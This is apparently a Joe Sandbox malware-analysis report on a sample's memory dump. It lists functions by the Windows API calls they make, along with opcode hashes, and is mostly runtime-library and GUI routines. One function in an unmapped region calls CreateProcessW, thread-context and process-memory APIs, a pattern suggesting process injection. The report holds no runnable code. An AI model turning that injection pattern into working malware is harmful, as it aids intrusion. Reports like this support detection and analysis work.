Part of subcall function 00F20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F201B9
Part of subcall function 00F20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F201C1

Part of subcall function 00F160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F0F930), ref: 00F16154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F0F9CD
OleInitialize.OLE32(00000000), ref: 00F0FA4A
CloseHandle.KERNEL32(00000000), ref: 00F445C8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 9ab611360e6ddee7a49b76649422d465f4e68b5f2ad809ec628c3f2d5206f3fb
Instruction ID: 6a0cf409e8f2a45f660ce626f4144b605f6191ce85c1bf2676dfac222fa25ada
Opcode Fuzzy Hash: 9ab611360e6ddee7a49b76649422d465f4e68b5f2ad809ec628c3f2d5206f3fb
Instruction Fuzzy Hash: 5F81D3B0901A49CFC788DF29AF63E597BE5FB98B06750812AD009C7262E77464C4FF10

Function 00F0434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F04370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F04415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F04432

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 98209f36bce3e0c80a29447a4e48cf0a56396c945201491debd30c8b8f1ea3c6
Instruction ID: e9aad63cfd0ef9d2d895cebc097246fb6005070456375fd7013cc19de9840264
Opcode Fuzzy Hash: 98209f36bce3e0c80a29447a4e48cf0a56396c945201491debd30c8b8f1ea3c6
Instruction Fuzzy Hash: 5531C3B1904701CFD720DF24D885A9BBBF8FB48718F00092EE69A83291D771B948FB52

Function 00F2571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00F25733

Part of subcall function 00F2A16B: __NMSG_WRITE.LIBCMT ref: 00F2A192
Part of subcall function 00F2A16B: __NMSG_WRITE.LIBCMT ref: 00F2A19C

__NMSG_WRITE.LIBCMT ref: 00F2573A

Part of subcall function 00F2A1C8: GetModuleFileNameW.KERNEL32(00000000,00FC33BA,00000104,?,00000001,00000000), ref: 00F2A25A
Part of subcall function 00F2A1C8: ___crtMessageBoxW.LIBCMT ref: 00F2A308

Part of subcall function 00F2309F: ___crtCorExitProcess.LIBCMT ref: 00F230A5
Part of subcall function 00F2309F: ExitProcess.KERNEL32 ref: 00F230AE

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

RtlAllocateHeap.NTDLL(018B0000,00000000,00000001,00000000,?,?,?,00F20DD3,?), ref: 00F2575F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 8816e9974e0f4427a0b638d1439447fe31e3e3e7330d761d930b989a75ff2f25
Instruction ID: 549f33361896873e6adf2b5096e77bffe8f5e993abb7e2174a63fa22299a35fd
Opcode Fuzzy Hash: 8816e9974e0f4427a0b638d1439447fe31e3e3e7330d761d930b989a75ff2f25
Instruction Fuzzy Hash: 4001F172681B3ADBEA106738FC82B6E77888B82BB1F100429F8059B181DE788D017661

Function 00F698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F69548,?,?,?,?,?,00000004), ref: 00F698BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F698D1
CloseHandle.KERNEL32(00000000,?,00F69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F698D8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 5b8f5e0c9d74bd5a6115c7b3ab1c1b9eace1bbb55f96294c8cd63e6df0617373
Instruction ID: bdd8a008cd22b72e4ba8d026355fd075f29f4640bf7c9402fe873d487ebc50c8
Opcode Fuzzy Hash: 5b8f5e0c9d74bd5a6115c7b3ab1c1b9eace1bbb55f96294c8cd63e6df0617373
Instruction Fuzzy Hash: 50E08632140618BBD7212B64EC0DFEA7B19EB06770F104220FB14A90E087B11525A798

Function 00F0A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00F3FC01

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 8febae2d76739d4a4ea19e4fa31f07d4744f83ce57cb0b5a30a9e6694bb50888
Instruction ID: ec84fcbf2d0cb09c3cd0d497552c77dceea250e216aad4808ef61138d86368ac
Opcode Fuzzy Hash: 8febae2d76739d4a4ea19e4fa31f07d4744f83ce57cb0b5a30a9e6694bb50888
Instruction Fuzzy Hash: 57223771908301DFD724DF14C854B6ABBE1BF84314F15896DE89A8B2A2DB35EC45FB82

Function 00F04C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F04CBA

Strings

EA06, xrefs: 00F3D8CC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 28dc96682189ca685fcc8c35fb233889c1f96c3c66002306dc7a81dd894de94f
Instruction ID: a4b4614401ddb96589ca2ee9145035144fca03cc1d29dfd7c4c0faeb7adb9385
Opcode Fuzzy Hash: 28dc96682189ca685fcc8c35fb233889c1f96c3c66002306dc7a81dd894de94f
Instruction Fuzzy Hash: 5A41AAE2E001586BDF218B64CC617BE7FA2DB01310F684064EE82DB2C2D634BD44B3A1

Function 00F07A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F07AAB
_memmove.LIBCMT ref: 00F07B16

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction ID: b25aa9f8068e00b1c7959d39310f843b3b6cd096065492443857ed1c9d2ecd94
Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction Fuzzy Hash: 9131E7B2B04606AFC704EF68D8D1E69B3A5FF483207158269E419CB2D1EB34F910EB90

Function 00F047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F04834

Part of subcall function 00F2336C: __lock.LIBCMT ref: 00F23372
Part of subcall function 00F2336C: DecodePointer.KERNEL32(00000001,?,00F04849,00F57C74), ref: 00F2337E
Part of subcall function 00F2336C: EncodePointer.KERNEL32(?,?,00F04849,00F57C74), ref: 00F23389

Part of subcall function 00F048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F04915
Part of subcall function 00F048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F0492A

Part of subcall function 00F03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B68
Part of subcall function 00F03B3A: IsDebuggerPresent.KERNEL32 ref: 00F03B7A
Part of subcall function 00F03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC52F8,00FC52E0,?,?), ref: 00F03BEB
Part of subcall function 00F03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F04874

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: a6321418bae539edf291105a2bedb5cf567cb7d87ebe8a8cbfb9ed55b2b4fd51
Instruction ID: d4addffe734b3e83c29314f4090135ce01b3269bbcbae861993877fd720fc79e
Opcode Fuzzy Hash: a6321418bae539edf291105a2bedb5cf567cb7d87ebe8a8cbfb9ed55b2b4fd51
Instruction Fuzzy Hash: E31193B19083199FD700DF68ED0694EBBE8EF95750F50891EF440832B1DBB49949EB91

Function 00F1092D Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03C14,00FC52F8,?,?,?), ref: 00F1096E

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

_wcscat.LIBCMT ref: 00F44CB7

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: f51d420e01c2c9b74d521bbb7f6014b5147e34710bbc52bc256a90c126278e6a
Instruction ID: a852c63a2429c70ff7842e2df12dbfc6317531b4b4ba6c07ff1bf52bf868a151
Opcode Fuzzy Hash: f51d420e01c2c9b74d521bbb7f6014b5147e34710bbc52bc256a90c126278e6a
Instruction Fuzzy Hash: 5411A571D05309AACB40FBA4CD56FDD77B8AF08750B4044A5B948D7286EEB4B7C87711

Function 00F20DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F2571C: __FF_MSGBANNER.LIBCMT ref: 00F25733
Part of subcall function 00F2571C: __NMSG_WRITE.LIBCMT ref: 00F2573A
Part of subcall function 00F2571C: RtlAllocateHeap.NTDLL(018B0000,00000000,00000001,00000000,?,?,?,00F20DD3,?), ref: 00F2575F

std::exception::exception.LIBCMT ref: 00F20DEC
__CxxThrowException@8.LIBCMT ref: 00F20E01

Part of subcall function 00F2859B: RaiseException.KERNEL32(?,?,?,00FB9E78,00000000,?,?,?,?,00F20E06,?,00FB9E78,?,00000001), ref: 00F285F0

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 24bdc7e774a54781fc7c9b59a7372129056ce7029004063c88ac1b696b8f0c34
Instruction ID: 4e7401c047066e9af084b2d56cdc1fbd25fa4c36b4e153545394dbcaa341401d
Opcode Fuzzy Hash: 24bdc7e774a54781fc7c9b59a7372129056ce7029004063c88ac1b696b8f0c34
Instruction Fuzzy Hash: 09F0A43690223E76DB10FAA4FC119DEB7AC9F01361F104426F90496182DFB49A81F6D1

Function 00F253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

__lock_file.LIBCMT ref: 00F253EB

Part of subcall function 00F26C11: __lock.LIBCMT ref: 00F26C34

__fclose_nolock.LIBCMT ref: 00F253F6

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3b320996271aba608899f7fd836aa600b1a19b5dc37225b7235000b2dce320f3
Instruction ID: 8b033e751cb9e1bd7fbda63f5a26fe2190a23b300936675f6bb7913628bd05b5
Opcode Fuzzy Hash: 3b320996271aba608899f7fd836aa600b1a19b5dc37225b7235000b2dce320f3
Instruction Fuzzy Hash: 1AF09631802A249ADB11FBA5BC017AD76E16F41BB5F209148E424AB1C1CBBC8D42BB52

Function 018F3F6D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018F472B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018F47C1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018F47E3

Memory Dump Source

Source File: 00000000.00000002.1350674871.00000000018F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 018F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f2000_k9OEsV37GE.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 289f28e3585113340d492d24f6c96837bdbc1a9032f0c8db2af126c8364f4931
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: C312CD24E24658C6EB24DF64D8507DEB232EF68300F1091ED910DEB7A5E77A4F81CB5A

Function 00F0750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F075EA

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d2bfcf7297391e768810fd76e2336bb89c6a53483e9f203b05f212f2b75fd123
Instruction ID: e51596cec5d5e35dafe098507280fd03bdf1aa2dfd3e5bc5cafb790b5db7abeb
Opcode Fuzzy Hash: d2bfcf7297391e768810fd76e2336bb89c6a53483e9f203b05f212f2b75fd123
Instruction Fuzzy Hash: 98318875A087129FC714EF19D850A72F7A0FF45320758C5A9E94A8B791DB30F841FB94

Function 00F20C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00F20CB7

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 2c62f44e0cf66a9c5460809dee7a091e96cc6fcfad3c882409ff20bd2d801df2
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7F3106B2A401159FC718DF08E494A69F7A6FF49310B2487A5E80ADB352DB31EDC1EBC0

Function 00F3FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00F3FCB7

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 11046bb26dc3098a3f80056549d06f5f16c96d3b0602bce5bf6c73339cadbd81
Instruction ID: 7bcb9fb93681dabe668494c780d0ac8643167bd6efecb061e1e3c6364d6dd7ef
Opcode Fuzzy Hash: 11046bb26dc3098a3f80056549d06f5f16c96d3b0602bce5bf6c73339cadbd81
Instruction Fuzzy Hash: 93411A749083519FDB14DF14C848B1ABBE0BF45324F0988ACE8998B3A2C735EC49EF52

Function 00F108DC Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F03C14,00FC52F8,?,?,?), ref: 00F1096E

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

_wcscat.LIBCMT ref: 00F44CB7

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 34c377c4cc3ea66c00707bb4efc3880fb6891602208179542ed33f803cc13eaf
Instruction ID: 9ca10d04998776a8d6abbda9ea4de169c54d5b141d7a89bdeeb8836b56f9420a
Opcode Fuzzy Hash: 34c377c4cc3ea66c00707bb4efc3880fb6891602208179542ed33f803cc13eaf
Instruction Fuzzy Hash: 142128799052895FCB02EB71CCA7AC9BFB1EF0635074441D6F884CB142D975AACAEB12

